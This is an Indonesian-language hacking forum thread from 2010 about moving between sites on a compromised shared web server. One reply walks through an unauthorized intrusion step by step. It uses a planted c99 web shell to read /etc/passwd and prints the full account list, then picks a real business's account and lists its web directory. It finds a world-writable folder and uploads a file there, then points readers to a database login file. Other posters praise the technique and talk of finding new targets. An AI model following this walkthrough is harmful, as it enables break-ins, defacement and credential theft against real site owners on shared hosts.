Page 1 of 1

Jumping di server windows

Posted: Thu Aug 05, 2010 11:57 am
by anharku
hemm..informasi nigh, aku bagi disini yagh sapa tahu ada yg belum tahu tentang jumping di server windows :circle:
Image
dari yang aku pelajari , kalau dapet server windows lalu di bagian directory /rootnya ada tulisan domains, atau wwwroot nagh kaya gitu biasanya daftar domain yg bisa di jumping banyak tuh... tp juga tergantung keberuntungan hak akses juga sih hehehe,,,, :devil
kalau dagh dapet kek gitu mau diapain hayooo???? seragh deh mau diapan tangung sendiri dosa2nya :devil

salam
anharku

Re: Jumping di server windows

Posted: Thu Aug 05, 2010 1:26 pm
by abit doang
hihi,..
klo windos emang lebih enak liat2 file atau dir nya..
liat semua Drive & dir nya siapa tau ada file2 luchu,.. :P

Re: Jumping di server windows

Posted: Thu Aug 05, 2010 9:42 pm
by Xshadow
gak windows gak linux... paling gampang ya dibaca dulu httpd.conf-nya

Re: Jumping di server windows

Posted: Fri Aug 06, 2010 10:10 am
by anharku
Xshadow wrote:gak windows gak linux... paling gampang ya dibaca dulu httpd.conf-nya
hem... makasih KK atas masukannya :kaca:

Re: Jumping di server windows

Posted: Sat Aug 07, 2010 4:25 pm
by 3xtr3m3b0y
Lebih gampang lg tinggal UP..UP..UP doank Om

Re: Jumping di server windows

Posted: Sat Aug 07, 2010 5:50 pm
by abit doang
klo model shell ku ini gimana..??
udah mati kutu kayaknya ...
permision 755, kagak ada file penting pula,..
mo UP juga gak bisa,..
atau masih bisa digoyang.???

Code: Select all

http://mau-tau-aja.lu/apaajaboleh/INF0.php
nb : file d aplod via FTP, hasil nemu di web saudaranya..
nb2 : shell (link) location, hide by me,..
nb3 : klo mao tau lokasinya, please PM me..
:tapa: :maaf: :devil :malumalu: :circle:

Re: Jumping di server windows

Posted: Sun Aug 08, 2010 8:33 am
by 3xtr3m3b0y
abit doang wrote:klo model shell ku ini gimana..??
udah mati kutu kayaknya ...
permision 755, kagak ada file penting pula,..
mo UP juga gak bisa,..
atau masih bisa digoyang.???
Masih sangat bisa koq Om:
Modal kita saat ini:
Webshell: c99
Path Web Direktori: /home/<user>/public_html

Dari kedua modal di atas kita bisa mencari informasi lokasi yg bisa ditulisi maupun mencari info login ke database, berikut langkah2 yg bisa sy lakukan:

1. Lihat isi /etc/passwd
ketikkan ini pada Bag. Command Execution:
cat /etc/passwd
Selanjutnya akan ditampilkan daftar user yg ada pada sistem.

Code: Select all

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
loansnow:x:512:512::/home/loansnow:/bin/bash
jk:x:32007:32009::/home/jk:/bin/bash
murrland:x:513:513::/home/murrland:/bin/bash
murrclas:x:514:514::/home/murrclas:/bin/bash
wwwinre:x:515:515::/home/wwwinre:/bin/bash
wwwcoor:x:516:516::/home/wwwcoor:/bin/bash
magpie:x:517:517::/home/magpie:/bin/bash
wwwbbc:x:518:518::/home/wwwbbc:/bin/bash
wwwtaa:x:519:519::/home/wwwtaa:/bin/bash
wwwremfi:x:520:520::/home/wwwremfi:/bin/bash
murrcom:x:521:521::/home/murrcom:/bin/bash
wwwclic:x:522:522::/home/wwwclic:/bin/bash
wwwsesa:x:523:523::/home/wwwsesa:/bin/bash
wwwscsa:x:524:524::/home/wwwscsa:/bin/bash
wwwbb:x:525:525::/home/wwwbb:/bin/bash
wwwbv:x:526:526::/home/wwwbv:/bin/bash
westate:x:528:528::/home/westate:/usr/local/cpanel/bin/jailshell
djautos:x:529:529::/home/djautos:/usr/local/cpanel/bin/jailshell
raptchau:x:530:530::/home/raptchau:/bin/bash
wwwweb:x:531:531::/home/wwwweb:/bin/bash
supasorb:x:532:532::/home/supasorb:/bin/bash
yoshiki:x:533:533::/home/yoshiki:/bin/bash
bcampers:x:534:534::/home/bcampers:/bin/bash
wwwposi:x:535:535::/home/wwwposi:/usr/local/cpanel/bin/noshell
wwwbsre:x:536:536::/home/wwwbsre:/usr/local/cpanel/bin/noshell
wwwmjf:x:537:537::/home/wwwmjf:/bin/bash
wwwblue:x:538:538::/home/wwwblue:/usr/local/cpanel/bin/noshell
wwwace4:x:539:539::/home/wwwace4:/usr/local/cpanel/bin/noshell
wwwaloa:x:540:540::/home/wwwaloa:/usr/local/cpanel/bin/noshell
wwwmorg:x:541:541::/home/wwwmorg:/usr/local/cpanel/bin/noshell
wwwfair:x:542:542::/home/wwwfair:/usr/local/cpanel/bin/noshell
themurrl:x:543:543::/home/themurrl:/bin/bash
wwwrich:x:544:544::/home/wwwrich:/bin/bash
raok:x:545:545::/home/raok:/usr/local/cpanel/bin/noshell
wwwstyl:x:546:546::/home/wwwstyl:/usr/local/cpanel/bin/noshell
wwwsama:x:547:547::/home/wwwsama:/usr/local/cpanel/bin/noshell
wwwwater:x:548:548::/home/wwwwater:/bin/bash
wwwmill:x:549:549::/home/wwwmill:/bin/bash
wwwbcam:x:550:550::/home/wwwbcam:/bin/bash
hillssa:x:551:551::/home/hillssa:/bin/bash
wwwaldi:x:552:552::/home/wwwaldi:/bin/bash
propoly:x:553:553::/home/propoly:/bin/bash
mwl33577:x:554:554::/home/mwl33577:/usr/local/cpanel/bin/jailshell
wwwcindy:x:555:555::/home/wwwcindy:/bin/bash
wwwharr:x:556:556::/home/wwwharr:/bin/bash
wwwsaski:x:557:557::/home/wwwsaski:/bin/bash
hartmann:x:558:558::/home/hartmann:/bin/bash
miniminy:x:559:559::/home/miniminy:/bin/bash
wwwurban:x:560:560::/home/wwwurban:/bin/bash
ehmpcg:x:561:561::/home/ehmpcg:/bin/bash
wwwincon:x:562:562::/home/wwwincon:/bin/bash
wwwgecr:x:563:563::/home/wwwgecr:/bin/bash
wwwholb:x:564:564::/home/wwwholb:/bin/bash
murray:x:565:565::/home/murray:/usr/local/cpanel/bin/jailshell
masonsre:x:566:566::/home/masonsre:/usr/local/cpanel/bin/jailshell
wwwdogs:x:567:567::/home/wwwdogs:/bin/bash
mbbook:x:568:568::/home/mbbook:/bin/bash
blondies:x:569:569::/home/blondies:/bin/bash
wwwmach:x:570:570::/home/wwwmach:/bin/bash
polarpri:x:571:571::/home/polarpri:/usr/local/cpanel/bin/noshell
polardis:x:573:573::/home/polardis:/bin/bash
mclascom:x:503:500::/home/mclascom:/bin/bash
polar2:x:504:501::/home/polar2:/bin/bash
wwwcool:x:505:502::/home/wwwcool:/bin/bash
murraybr:x:506:503::/home/murraybr:/bin/bash
mbmotel:x:507:504::/home/mbmotel:/bin/bash
wwwridl:x:508:505::/home/wwwridl:/bin/bash
spirit09:x:509:506::/home/spirit09:/bin/bash
mbunited:x:574:507::/home/mbunited:/bin/bash
aungerre:x:575:508::/home/aungerre:/bin/bash
bexhaust:x:576:509::/home/bexhaust:/bin/bash
taylored:x:577:574::/home/taylored:/bin/bash
wwwzen:x:578:575::/home/wwwzen:/bin/bash
mbmerc:x:579:576::/home/mbmerc:/bin/bash
wwwroof:x:580:577::/home/wwwroof:/bin/bash
wwwopen:x:581:578::/home/wwwopen:/bin/bash
leadinge:x:582:579::/home/leadinge:/bin/bash
wwwpure:x:583:580::/home/wwwpure:/bin/bash
wwwspend:x:584:581::/home/wwwspend:/bin/bash
mbplay:x:585:582::/home/mbplay:/bin/bash
wwwlej:x:586:583::/home/wwwlej:/bin/bash
wwwtoto:x:587:584::/home/wwwtoto:/bin/bash
wwwmbweb:x:588:585::/home/wwwmbweb:/bin/bash
wwwdab:x:589:586::/home/wwwdab:/bin/bash
polar3:x:590:587::/home/polar3:/bin/bash
wwwprint:x:591:588::/home/wwwprint:/bin/bash
wwwmbmc:x:592:589::/home/wwwmbmc:/bin/bash
mbinvest:x:593:590::/home/mbinvest:/bin/bash
Target sy kali ini adalah user bernama hartmann

2. Dari info user yg telah kita dapatkan, kita bisa mencoba masuk ke lokasi webdir masing2 user.

ls -l /home/hartmann/public_html

Result:

Code: Select all

total 2072
-rw-r--r-- 1 hartmann hartmann    8327 Nov 21  2009 AC_RunActiveContent.js
drwxr-xr-x 2 hartmann hartmann    4096 Sep 25  2009 admin
drwxr-xr-x 2 hartmann hartmann    4096 Sep 10  2009 cgi-bin
-rw-r--r-- 1 hartmann hartmann   12763 Nov 23  2009 contactus.htm
drwxr-xr-x 3 hartmann hartmann    4096 Sep 24  2009 css
-rw-r--r-- 1 hartmann hartmann    7760 Sep 24  2009 gallery.htm
drwxrwxrwx 2 hartmann hartmann    4096 Mar  7 18:06 galleryimages
-rw-r--r-- 1 hartmann hartmann    9319 Nov 21  2009 gallery.php
-rw-r--r-- 1 hartmann hartmann   43815 Nov 21  2009 hartwhite.swf
-rw-r--r-- 1 hartmann hartmann   24155 Nov 23  2009 home.htm
drwxr-xr-x 3 hartmann hartmann    4096 Nov 21  2009 images
drwxr-xr-x 2 hartmann hartmann    4096 Sep 24  2009 include
-rw-r--r-- 1 hartmann hartmann    4470 Oct 27  2009 meetthestaff.htm
drwxr-xr-x 4 hartmann hartmann    4096 Sep 15  2009 _mm
drwxr-xr-x 2 hartmann hartmann    4096 Nov 23  2009 _notes
-rw-r--r-- 1 hartmann hartmann     132 Sep 15  2009 robots.txt
-rw-r--r-- 1 hartmann hartmann    6629 Nov 23  2009 services.htm
-rw-r--r-- 1 hartmann hartmann    8949 Nov 21  2009 Southcoast.htm
-rw-r--r-- 1 hartmann hartmann 1931680 Oct 23  2009 swflash.cab
3. Mencari lokasi yg bisa ditulisi:
Dari daftar file dan dir yg telah ditampilkan di atas, terdapat 1 lokasi yg bisa kita tulisi, yaitu:

drwxrwxrwx 2 hartmann hartmann 4096 Mar 7 18:06 galleryimages

Kita bisa langsung menuju ke lokasi tsb, lalu mengunggah atau membuat file milik kita.
Hasilnya:
http://hartmannplumbing.com.au/galleryi ... 3m3b0y.txt

4. Hal lain yg bisa kita lakukan adalah mencari info koneksi ke database.
Mata sy tertuju ke Direktori:
drwxr-xr-x 2 hartmann hartmann 4096 Sep 24 2009 include

Saya kemudian masuk ke lokasi tsb dan menemukan file2 menarik:

Code: Select all

total 172
-rw-r--r-- 1 hartmann hartmann   1870 Sep 24  2009 dbfunctions.inc
-rw-r--r-- 1 hartmann hartmann   4968 Sep 24  2009 functions.inc
-rw-r--r-- 1 hartmann hartmann   4014 Sep 15  2009 gallery.css
-rw-r--r-- 1 hartmann hartmann  11630 Sep 15  2009 gallery.js
-rw-r--r-- 1 hartmann hartmann 120620 Sep 15  2009 jquery.js
-rw-r--r-- 1 hartmann hartmann    106 Sep 24  2009 logins.inc
-rw-r--r-- 1 hartmann hartmann   4021 Sep 15  2009 thickbox.css
-rw-r--r-- 1 hartmann hartmann  11629 Sep 15  2009 thickbox.js
Selanjutnya sy coba buka isi file logins.inc
Hasilnya:
Cek sj sendiri ahh... :P

Ok, that's all folks

Re: Jumping di server windows

Posted: Sun Aug 08, 2010 12:25 pm
by anharku
makasih om 3xtr3m3b0y atas tekniknya..
nah tuh dah diajarin :circle:
coba dengan berbagai cara.. kalau emang udagh mentok ya udagh cari target lain :devil

Re: Jumping di server windows

Posted: Sun Aug 08, 2010 7:12 pm
by abit doang
@ om 3xtr3m3b0y
makasih om, ilmu baru lagi nih buat ku,..
jadi intinya walaupun kita gak bisa pindah dir -> $cd
tapi ada kemungkinan buat $ls | $cat | dll..
mantaaap.....
:kaca: :tapa: :licik: :malumalu: